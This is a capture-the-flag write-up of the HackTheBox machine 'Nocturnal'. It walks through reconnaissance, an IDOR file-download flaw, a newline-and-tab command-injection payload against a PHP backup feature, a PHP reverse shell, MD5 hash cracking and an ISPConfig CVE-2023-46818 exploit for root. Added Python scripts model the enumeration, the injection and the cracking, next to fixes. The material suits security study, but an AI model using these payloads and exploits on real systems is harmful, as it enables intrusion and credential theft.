[HTB] nocturnal


流萤

Preface

Now that things have calmed down, back to some boxes. Short version of this machine: an insecure file-download endpoint (an IDOR that lets you enumerate and fetch other users' files), a command injection in the admin backup feature, and a vulnerable service on the internal network. Overall fairly easy.

Information gathering

nmap

$ sudo nmap -p- --min-rate=10000 10.10.11.64
Starting Nmap 7.93 ( https://nmap.org ) at 2025-04-24 05:11 EDT
Nmap scan report for 10.10.11.64
Host is up (0.18s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 11.12 seconds

$ sudo nmap -sT -sV -O -p22,80 10.10.11.64
Starting Nmap 7.93 ( https://nmap.org ) at 2025-04-24 05:13 EDT
Nmap scan report for nocturnal.htb (10.10.11.64)
Host is up (0.17s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 3.1 (94%), Linux 3.2 (94%), Linux 5.4 (94%), Linux 5.3 - 5.4 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (94%), Linux 5.0 - 5.3 (94%), HP P2000 G3 NAS device (93%), ASUS RT-N56U WAP (Linux 3.4) (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.04 seconds

$ sudo nmap -sU -p22,80 10.10.11.64
Starting Nmap 7.93 ( https://nmap.org ) at 2025-04-24 05:14 EDT
Nmap scan report for nocturnal.htb (10.10.11.64)
Host is up (0.17s latency).

PORT STATE SERVICE
22/udp closed ssh
80/udp closed http

Nmap done: 1 IP address (1 host up) scanned in 0.53 seconds

$ sudo nmap --script=vuln -p22,80 10.10.11.64
Starting Nmap 7.93 ( https://nmap.org ) at 2025-04-24 05:14 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for nocturnal.htb (10.10.11.64)
Host is up (0.17s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-fileupload-exploiter:
|
| Couldn't find a file-type field.
|
|_ Couldn't find a file-type field.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /login.php: Possible admin folder
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set

Nmap done: 1 IP address (1 host up) scanned in 483.20 seconds

Only 22 and 80 are open, and the initial vuln-script scan found nothing special (just a PHPSESSID cookie without the HttpOnly flag and a /login.php). We can try nikto later; for now the priority is the web app on port 80.

whatweb

$ sudo whatweb 10.10.11.64
http://10.10.11.64 [302 Found] Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.64], RedirectLocation[http://nocturnal.htb/], Title[302 Found], nginx[1.18.0]
ERROR Opening: http://nocturnal.htb/ - no address for nocturnal.htb

$ sudo vim /etc/hosts

$ sudo whatweb 10.10.11.64
http://10.10.11.64 [302 Found] Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.64], RedirectLocation[http://nocturnal.htb/], Title[302 Found], nginx[1.18.0]
http://nocturnal.htb/ [200 OK] Cookies[PHPSESSID], Country[RESERVED][ZZ], Email[support@nocturnal.htb], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.64], Title[Welcome to Nocturnal], nginx[1.18.0]

The IP redirects to http://nocturnal.htb/, so add 10.10.11.64 nocturnal.htb to /etc/hosts.

nikto

$ sudo nikto -h nocturnal.htb
- ***** TLS/SSL support not available (see docs for SSL install) *****
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.11.64
+ Target Hostname: nocturnal.htb
+ Target Port: 80
+ Start Time: 2025-04-24 05:24:24 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0 (Ubuntu)
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ nginx/1.18.0 appears to be outdated (current is at least 1.25.3).
+ /login.php: Admin login page/section found.
+ 7961 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2025-04-24 05:50:44 (GMT-4) (1580 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The scan finds basically nothing useful beyond what nmap already showed.

Web penetration

Visiting the site

While trying the site's functions by hand, run directory discovery and subdomain fuzzing in the background; it saves time and makes sure nothing useful is missed.

Directory discovery

$ dirb http://nocturnal.htb

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Apr 24 05:31:26 2025
URL_BASE: http://nocturnal.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://nocturnal.htb/ ----
+ http://nocturnal.htb/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://nocturnal.htb/backups/
+ http://nocturnal.htb/index.php (CODE:200|SIZE:1524)

---- Entering directory: http://nocturnal.htb/backups/ ----

-----------------
END_TIME: Thu Apr 24 06:01:47 2025
DOWNLOADED: 9224 - FOUND: 2

$ sudo gobuster dir --url http://nocturnal.htb --wordlist /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt

There is an admin.php, but visiting it just redirects to index.php; presumably it needs a session cookie belonging to an admin account. (That turns out to be the case.)

Subdomain fuzzing

$ wfuzz -H "Host: FUZZ.nocturnal.htb" --hc 404,403 -c -w /usr/share/Seclists/Discovery/DNS/subdomains-top1million-5000.txt http://nocturnal.htb

No other subdomains.

Visiting the site

(screenshot: site homepage)

The homepage describes the site's business: users can upload Word, Excel and PDF files and download them anytime, anywhere. Essentially a file storage server. Anything with file upload makes us wonder about uploading a webshell, so first register an account, log in, and see which file types are accepted and whether the upload is exploitable.

Registered a throwaway account, logged in, and uploaded test.php to see what happens.

The response says only pdf, doc, docx, xls, xlsx and odt are supported. Doubling the extension and changing the extension in Burp both fail. So upload a normal PDF instead.


After uploading, the file can be downloaded, as the homepage promised. Clicking download, the URL is a GET request: http://nocturnal.htb/view.php?username=test&file=test.pdf. In fuzzing terms, both the username and the file parameter are obvious targets. First tweak the two parameters by hand and see how the server reacts.


Changing the username returns "user does not exist". Changing the file name to one that does not exist returns "file does not exist" together with the list of files that user can download. Does that mean we can ask for a nonexistent file to learn, and then fetch, other users' stored files? Register a second account, upload a file, change username to that account, and it downloads fine: view.php checks that the named user exists but never that the requester is that user. So fuzz the username parameter to enumerate other users.

$ wfuzz --hh 2985 -w /Tools/fuzzDict/FuzzDicts/userNameDict/user.txt -b PHPSESSID=oqjc1kfqih7dkcej6al5h9o17p 'http://nocturnal.htb/view.php?username=FUZZ&file=test1.pdf'
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://nocturnal.htb/view.php?username=FUZZ&file=test1.pdf
Total requests: 8886

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000001: 200 128 L 247 W 3037 Ch "admin"
000000016: 200 128 L 248 W 3105 Ch "test"
000000645: 200 128 L 248 W 3113 Ch "amanda"
000008252: 200 128 L 247 W 3037 Ch "tobias"

Total time: 177.2074
Processed Requests: 8886
Filtered Requests: 8882
Requests/sec.: 50.14461

So there are three more users: admin, amanda and tobias. admin has no files (tobias's response is the same size), while amanda's listing shows a privacy.odt, so download it and see what's in it.
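The same enumeration done in a script rather than with wfuzz, as an added example that is not part of the original write-up. The request handler fake_view is a constructed stand-in for view.php (its HTML is invented); the only behaviour taken from the page is that an unknown username gets a fixed "user does not exist" page while a known username with a missing file gets that user's file listing. Rather than hard-coding the baseline size (wfuzz's --hh 2985), the script measures it with two random usernames first, which is the check you want before trusting a length-based filter.

```python
import re
import secrets
from typing import Callable, Dict, List, Tuple

# Constructed stand-in for the target's view.php; the HTML below is hypothetical
# and only mirrors the three behaviours observed on the page.
_FAKE_FILES: Dict[str, List[str]] = {
    "admin": [],
    "amanda": ["privacy.odt"],
    "test": ["test.pdf"],
    "tobias": [],
}


def fake_view(username: str, filename: str) -> str:
    """Simulates GET /view.php?username=...&file=... with a valid PHPSESSID."""
    page = "<html><body>{}</body></html>"
    files = _FAKE_FILES.get(username)
    if files is None:
        return page.format("<p>User does not exist.</p>")
    if filename in files:
        return page.format("(file bytes would be served here)")
    listing = "".join(f"<li>{f}</li>" for f in files)
    return page.format(f"<p>File does not exist.</p><ul>{listing}</ul>")


def enumerate_users(candidates: List[str], fetch: Callable[[str, str], str],
                    probe_file: str = "nonexistent.pdf") -> List[Tuple[str, int]]:
    """Return (username, response_length) for every candidate whose response
    differs from the 'unknown user' baseline.

    The baseline is measured with two random usernames that cannot exist. If
    the two sizes disagree, length is not a safe discriminator for this
    endpoint and the caller should filter on a marker string instead.
    """
    baseline = len(fetch(secrets.token_hex(8), probe_file))
    if len(fetch(secrets.token_hex(8), probe_file)) != baseline:
        raise RuntimeError("unstable baseline; filter on a marker string, not length")
    found = []
    for name in candidates:
        body = fetch(name, probe_file)
        if len(body) != baseline:
            found.append((name, len(body)))
    return found


def listed_files(body: str) -> List[str]:
    """Pull file names out of a listing page (pattern matches the fake HTML above)."""
    return re.findall(r"<li>(.*?)</li>", body)


if __name__ == "__main__":
    wordlist = ["admin", "bob", "amanda", "test", "tobias", "carol"]
    for user, size in enumerate_users(wordlist, fake_view):
        print(user, size, listed_files(fake_view(user, "nonexistent.pdf")))
```

Against the real target, replace fake_view with a function that performs the HTTP request with the session cookie and returns the body; the enumeration logic does not change.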


Opening it, it's an email from the IT team handing the user a temporary password, which gives us amanda's password.

Dear Amanda,
Nocturnal has set the following temporary password for you: ****************. This password has been set for all our services, so it is essential that you change it on your first login to ensure the security of your account and our infrastructure.
The file has been created and provided by Nocturnal's IT team. If you have any questions or need additional assistance during the password change process, please do not hesitate to contact us.
Remember that maintaining the security of your credentials is paramount to protecting your information and that of the company. We appreciate your prompt attention to this matter.

Yours sincerely,
Nocturnal's IT team

Let's log in with it.


There is now a link to the admin panel.


This page lets us view the PHP source of each page and create a backup by entering a password. Look at the source of admin.php; the part that matters is the backup creation, excerpted below.

<?php
function cleanEntry($entry) {
    $blacklist_chars = [';', '&', '|', '$', ' ', '`', '{', '}', '&&'];

    foreach ($blacklist_chars as $char) {
        if (strpos($entry, $char) !== false) {
            return false; // Malicious input detected
        }
    }

    return htmlspecialchars($entry, ENT_QUOTES, 'UTF-8');
}

// (excerpt: the panel's HTML between the two PHP blocks is omitted)

if (isset($_POST['backup']) && !empty($_POST['password'])) {
    $password = cleanEntry($_POST['password']);
    $backupFile = "backups/backup_" . date('Y-m-d') . ".zip";

    if ($password === false) {
        echo "<div class='error-message'>Error: Try another password.</div>";
    } else {
        $logFile = '/tmp/backup_' . uniqid() . '.log';

        $command = "zip -x './backups/*' -r -P " . $password . " " . $backupFile . " . > " . $logFile . " 2>&1 &";

        $descriptor_spec = [
            0 => ["pipe", "r"],           // stdin
            1 => ["file", $logFile, "w"], // stdout
            2 => ["file", $logFile, "w"], // stderr
        ];

        $process = proc_open($command, $descriptor_spec, $pipes);
        if (is_resource($process)) {
            proc_close($process);
        }

        sleep(2);

        $logContents = file_get_contents($logFile);
        if (strpos($logContents, 'zip error') === false) {
            echo "<div class='backup-success'>";
            echo "<p>Backup created successfully.</p>";
            echo "<a href='" . htmlspecialchars($backupFile) . "' class='download-button' download>Download Backup</a>";
            echo "<h3>Output:</h3><pre>" . htmlspecialchars($logContents) . "</pre>";
            echo "</div>";
        } else {
            echo "<div class='error-message'>Error creating the backup.</div>";
        }

        unlink($logFile);
    }
}
?>

After reviewing the code, the line $command = "zip -x './backups/*' -r -P " . $password . " " . $backupFile . " . > " . $logFile . " 2>&1 &"; is obviously the one to focus on: $password is under our control, and the string is handed to proc_open(), which runs it through /bin/sh. The catch is that cleanEntry() rejects any password containing ';', '&', '|', '$', ' ', '`', '{', '}' or '&&'.

Two gaps in that filter matter. Tab and newline are not blacklisted, so a tab can stand in for the filtered space, and a newline ends the zip command so that whatever follows runs as a separate shell command. Also, the blacklist check happens before htmlspecialchars(), so double and single quotes reach the shell rewritten as &quot; and &#039;; payloads that rely on quoting are therefore unreliable, and it is simplest to avoid quotes altogether.
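A Python model of the filter and the command line, added here and not part of the target's code or the write-up. It re-implements cleanEntry() and the zip string byte for byte, splits the result the way /bin/sh will, URL-encodes a payload for the form body, and puts a hardened argv-based variant next to it. The backup and log paths are illustrative.

```python
import re
import shlex
from typing import List, Union
from urllib.parse import quote

BLACKLIST = [';', '&', '|', '$', ' ', '`', '{', '}', '&&']


def php_htmlspecialchars_ent_quotes(s: str) -> str:
    """Mirrors PHP htmlspecialchars($s, ENT_QUOTES, 'UTF-8')."""
    return (s.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')
             .replace('"', '&quot;').replace("'", '&#039;'))


def clean_entry(entry: str) -> Union[str, bool]:
    """Same behaviour as cleanEntry(): False on a blacklisted char, else the escaped value.
    Note what is NOT in the list: '\\n' and '\\t'."""
    for ch in BLACKLIST:
        if ch in entry:
            return False
    return php_htmlspecialchars_ent_quotes(entry)


def build_command(password: str,
                  backup_file: str = "backups/backup_2025-04-24.zip",
                  log_file: str = "/tmp/backup_x.log") -> str:
    """The exact string the vulnerable page hands to proc_open() (illustrative paths)."""
    return f"zip -x './backups/*' -r -P {password} {backup_file} . > {log_file} 2>&1 &"


def shell_lines(command: str) -> List[List[str]]:
    """Split the way a POSIX shell does: newline ends a command, tab separates words."""
    return [shlex.split(line) for line in command.split("\n") if line.strip()]


def encode_for_form(payload: str) -> str:
    """Percent-encode the payload for the application/x-www-form-urlencoded body."""
    return quote(payload, safe="")


# --- hardened form: no shell, and an allow-list on the password --------------

def password_is_acceptable(password: str) -> bool:
    """Allow-list instead of a blacklist; the only robust way to filter input
    that is destined for a command line."""
    return re.fullmatch(r"[A-Za-z0-9._-]{8,64}", password) is not None


def build_argv(password: str, backup_file: str) -> List[str]:
    """Hand this list to subprocess.run(argv) (PHP: proc_open() with an array,
    or escapeshellarg() on each piece). The password is a single argv element,
    so no byte in it can start a second command."""
    return ["zip", "-x", "./backups/*", "-r", "-P", password, backup_file, "."]


if __name__ == "__main__":
    payload = "12345\nbash\t-c\tid\n"        # newline breaks out, tab replaces space
    cleaned = clean_entry(payload)
    print("filter passed:", cleaned == payload)
    for words in shell_lines(build_command(cleaned)):
        print("shell sees:", words)
    print("form body value:", encode_for_form(payload))
    print("hardened argv:", build_argv("S3cure-pass", "backups/b.zip"))
```

shell_lines only models word splitting and newline separation; it is enough to show that the second line becomes its own bash -c invocation, which is exactly what the original filter was supposed to prevent.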

We also notice that dashboard.php reveals where the database lives:

<?php
session_start();
if (!isset($_SESSION['user_id'])) {
header('Location: login.php');
exit();
}

$db = new SQLite3('../nocturnal_database/nocturnal_database.db');
$user_id = $_SESSION['user_id'];
$username = $_SESSION['username'];

We considered packing that database into the backup as well. I tried several payloads here without success:

\"	-r	../nocturnal_database/*

123 -r ../nocturnal_database/*

123 -i ../nocturnal_database/nocturnal_database.db

123 ../nocturnal_database/nocturnal_database.db

" -i ../nocturnal_database/*

123" ../nocturnal_database/nocturnal_database.db

After a lot of fiddling with no result, let's just break out of the command and drop a reverse shell instead. Since the password is sent in a URL-encoded form body, the payload has to be URL-encoded. First check whether terminating the command works: 12345%0abash%09-c%09"pwd"%0a, where %0a is the URL encoding of a newline, %09 of a tab, and %23 of #.

The command runs, so now upload a reverse shell. Grab the pentestmonkey-style PHP reverse shell from revshells.com, serve it from a simple Python HTTP server on our machine, pull it onto the target through the same injection, and run php shell.php.


With that we have a shell on the box as www-data.

Privilege escalation

Escalating to a regular user

Something was off with this shell after connecting; the input echo was a garbled mess, so I won't record that part here.

www-data has very low privileges and can't read the user flag, so we need to reach a regular user. In www-data's home directory (/var/www), the nocturnal_database directory contains nocturnal_database.db, the database we failed to grab earlier. Start a python3 HTTP server there and download it locally to look at it.

$ sqlite3 nocturnal_database.db
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .tables
uploads users
sqlite> select * from users;
1|admin|d725aeba143f575736b07e045d8ceebb
2|amanda|df8b20aa0c935023f99ea58358fb63c4
4|tobias|55c82b1ccd55ab219b3b109b07d5061d
6|kavi|f38cde1654b39fea2bd4f72f1ae4cdda
7|e0Al5|101ad4543a96a7fd84908fd0d802e7db
8|test|098f6bcd4621d373cade4e832627b4f6
9|test@test.com|098f6bcd4621d373cade4e832627b4f6
10|testit1234|683e2726217b6911c6175bafe9da906d
11|111|698d51a19d8a121ce581499d7b701668
12|hello|5d41402abc4b2a76b9719d911017c592
13|abc|81dc9bdb52d04dc20036dbd8313ed055
14|akared|96e79218965eb72c92a549dd5a330112

There are the users we fuzzed earlier: admin, amanda and tobias. The hashes are 32 hex digits with no salt, i.e. plain MD5, and tobias is the one with a home directory, so try cracking his hash. The hashes.com site does this:

55c82b1ccd55ab219b3b109b07d5061d:*******************
f38cde1654b39fea2bd4f72f1ae4cdda:kavi
101ad4543a96a7fd84908fd0d802e7db:e0Al5
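The same dictionary check done offline with hashlib, as an added example that is not part of the write-up. It takes the rows from the dump above, tries a small constructed wordlist plus each username as its own password (the kavi:kavi and e0Al5:e0Al5 pattern), and also reports hashes shared between accounts, something that is only visible because the hashes are unsalted. A real run would use a large wordlist such as rockyou.txt; tobias's password is left uncracked here.

```python
import hashlib
from typing import Dict, List, Tuple

# (id, username, md5) rows as dumped from nocturnal_database.db on the page.
USERS: List[Tuple[int, str, str]] = [
    (1, "admin", "d725aeba143f575736b07e045d8ceebb"),
    (2, "amanda", "df8b20aa0c935023f99ea58358fb63c4"),
    (4, "tobias", "55c82b1ccd55ab219b3b109b07d5061d"),
    (6, "kavi", "f38cde1654b39fea2bd4f72f1ae4cdda"),
    (7, "e0Al5", "101ad4543a96a7fd84908fd0d802e7db"),
    (8, "test", "098f6bcd4621d373cade4e832627b4f6"),
    (9, "test@test.com", "098f6bcd4621d373cade4e832627b4f6"),
    (11, "111", "698d51a19d8a121ce581499d7b701668"),
    (12, "hello", "5d41402abc4b2a76b9719d911017c592"),
]

# Constructed mini-wordlist for the example; use rockyou.txt or similar for real.
WORDLIST = ["password", "123456", "test", "hello", "111", "admin", "nocturnal"]


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def looks_like_unsalted_md5(h: str) -> bool:
    """32 lowercase/uppercase hex digits and nothing else: no algorithm tag, no salt."""
    return len(h) == 32 and all(c in "0123456789abcdefABCDEF" for c in h)


def crack(rows: List[Tuple[int, str, str]], wordlist: List[str]) -> Dict[str, str]:
    """username -> recovered password.

    Candidates are the wordlist plus every username (people reuse their login
    as a password). Because there is no salt, one md5 per candidate is checked
    against every account at once via the hash -> users index.
    """
    by_hash: Dict[str, List[str]] = {}
    for _, user, h in rows:
        by_hash.setdefault(h.lower(), []).append(user)
    candidates = list(wordlist) + [user for _, user, _ in rows]
    found: Dict[str, str] = {}
    for cand in candidates:
        for user in by_hash.get(md5_hex(cand), []):
            found.setdefault(user, cand)
    return found


def shared_hashes(rows: List[Tuple[int, str, str]]) -> Dict[str, List[str]]:
    """Hashes used by more than one account, i.e. accounts sharing a password."""
    by_hash: Dict[str, List[str]] = {}
    for _, user, h in rows:
        by_hash.setdefault(h.lower(), []).append(user)
    return {h: users for h, users in by_hash.items() if len(users) > 1}


if __name__ == "__main__":
    assert all(looks_like_unsalted_md5(h) for _, _, h in USERS)
    for user, pw in crack(USERS, WORDLIST).items():
        print(f"{user}: {pw}")
    print("shared:", shared_hashes(USERS))
```

The fix on the application side is a salted, slow hash (password_hash() with bcrypt or Argon2 in PHP), which removes both the one-hash-fits-all lookup and the shared-hash leak.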

That recovers tobias's password. Check for password reuse by trying it over SSH.

$ ssh tobias@10.10.11.64
tobias@10.10.11.64's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-212-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

System information as of Thu 24 Apr 2025 01:15:06 PM UTC

System load: 0.03
Usage of /: 56.7% of 5.58GB
Memory usage: 19%
Swap usage: 0%
Processes: 263
Users logged in: 1
IPv4 address for eth0: 10.10.11.64
IPv6 address for eth0: dead:beef::250:56ff:feb9:c065


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Apr 24 13:15:07 2025 from 10.10.14.40
tobias@nocturnal:~$ ll
total 36
drwxr-x--x 5 tobias tobias 4096 Oct 19 2024 ./
drwxr-xr-x 3 root root 4096 Oct 17 2024 ../
lrwxrwxrwx 1 root root 9 Oct 18 2024 .bash_history -> /dev/null
-rw-r--r-- 1 tobias tobias 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 tobias tobias 3771 Feb 25 2020 .bashrc
drwx------ 2 tobias tobias 4096 Oct 18 2024 .cache/
drwxrwxr-x 3 tobias tobias 4096 Oct 18 2024 .local/
-rw-r--r-- 1 tobias tobias 807 Feb 25 2020 .profile
lrwxrwxrwx 1 root root 9 Oct 18 2024 .sqlite_history -> /dev/null
drwx------ 2 tobias tobias 4096 Apr 24 12:40 .ssh/
-rw-r----- 1 root tobias 33 Apr 24 09:03 user.txt

Login succeeds, and the user flag is in tobias's home directory.

Escalating to root

  1. tobias has no sudo rights; next.

  2. Setuid binaries:

    tobias@nocturnal:~$ find / -type f -perm -04000 2>/dev/null
    /usr/bin/passwd
    /usr/bin/mount
    /usr/bin/chfn
    /usr/bin/su
    /usr/bin/chsh
    /usr/bin/newgrp
    /usr/bin/gpasswd
    /usr/bin/at
    /usr/bin/fusermount
    /usr/bin/sudo
    /usr/bin/umount
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/policykit-1/polkit-agent-helper-1
    /usr/lib/openssh/ssh-keysign

    Nothing exploitable among the setuid binaries either.

  3. Checked the cron jobs; nothing usable.

  4. Let's walk the filesystem by hand for anything worth noting.

    tobias@nocturnal:/tmp$ cat /etc/passwd | grep sh
    root:x:0:0:root:/root:/bin/bash
    fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
    sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
    tobias:x:1000:1000:tobias:/home/tobias:/bin/bash
    ispapps:x:1001:1002::/var/www/apps:/bin/sh
    ispconfig:x:1002:1003::/usr/local/ispconfig:/bin/sh

    Besides tobias, the accounts with a login shell are ispapps and ispconfig, and there are matching files under /var/www, so it's reasonable to suspect a corresponding service is running on the internal network.

    tobias@nocturnal:/var/www/php-fcgi-scripts$ ll
    total 16
    drwxr-xr-x 4 ispconfig ispconfig 4096 Oct 17 2024 ./
    drwxr-xr-x 6 ispconfig ispconfig 4096 Apr 14 09:26 ../
    drwxr-xr-x 2 ispconfig ispconfig 4096 Oct 17 2024 apps/
    drwxr-xr-x 2 ispconfig ispconfig 4096 Oct 17 2024 ispconfig/
    tobias@nocturnal:/var/www/php-fcgi-scripts$ ll apps/
    total 12
    drwxr-xr-x 2 ispconfig ispconfig 4096 Oct 17 2024 ./
    drwxr-xr-x 4 ispconfig ispconfig 4096 Oct 17 2024 ../
    -rwxr-xr-x 1 ispapps ispapps 281 Oct 17 2024 .php-fcgi-starter*
    tobias@nocturnal:/var/www/php-fcgi-scripts$ ll ispconfig/
    total 12
    drwxr-xr-x 2 ispconfig ispconfig 4096 Oct 17 2024 ./
    drwxr-xr-x 4 ispconfig ispconfig 4096 Oct 17 2024 ../
    -rwxr-xr-x 1 ispconfig ispconfig 300 Oct 17 2024 .php-fcgi-starter*
  5. linpeas was running in the background during the manual walk; use its output to confirm the hunch.

    ╔══════════╣ Active Ports
    ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports
    tcp 0 0 0.0.0.0:1234 0.0.0.0:* LISTEN -
    tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
    tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
    tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
    tcp 0 0 0.0.0.0:8000 0.0.0.0:* LISTEN -
    tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
    tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
    tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN -
    tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
    tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
    tcp6 0 0 :::22 :::* LISTEN -

    Port 8080 is indeed serving something. (3306 is obviously MySQL, 587 is most likely SMTP submission, and 8080 is a common alternate HTTP port, so it deserves the first look.) Forward it to our machine: ssh -L 9999:127.0.0.1:8080 tobias@10.10.11.64

    It's an ISPConfig site.


Trying tobias's credentials (tobias:**********) fails. Trying common usernames such as root and admin with the same password, admin logs in.


Once in, the help page shows the version: ISPConfig 3.2.10p1. Check whether this version has a usable vulnerability; searching "ISPConfig 3.2 exploit" turns up CVE-2023-46818.

Download exploit.py as its README describes. We already have the admin password, so run it against the forwarded port.

$ python3 exploit.py http://127.0.0.1:9999 admin ******************
[+] Target URL: http://127.0.0.1:9999/
[+] Logging in with username 'admin' and password '******************'
[+] Injecting shell
[+] Launching shell

ispconfig-shell# whoami
root


ispconfig-shell# ls -la /root
total 36
drwx------ 6 root root 4096 Apr 24 13:31 .
drwxr-xr-x 18 root root 4096 Mar 18 13:43 ..
lrwxrwxrwx 1 root root 9 Oct 18 2024 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwx------ 2 root root 4096 Mar 4 17:11 .cache
drwxr-xr-x 3 root root 4096 Oct 18 2024 .local
lrwxrwxrwx 1 root root 9 Oct 18 2024 .mysql_history -> /dev/null
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r----- 1 root root 33 Apr 24 13:31 root.txt
drwxr-xr-x 2 root root 4096 Apr 14 09:11 scripts
drwx------ 2 root root 4096 Oct 4 2024 .ssh

Root obtained.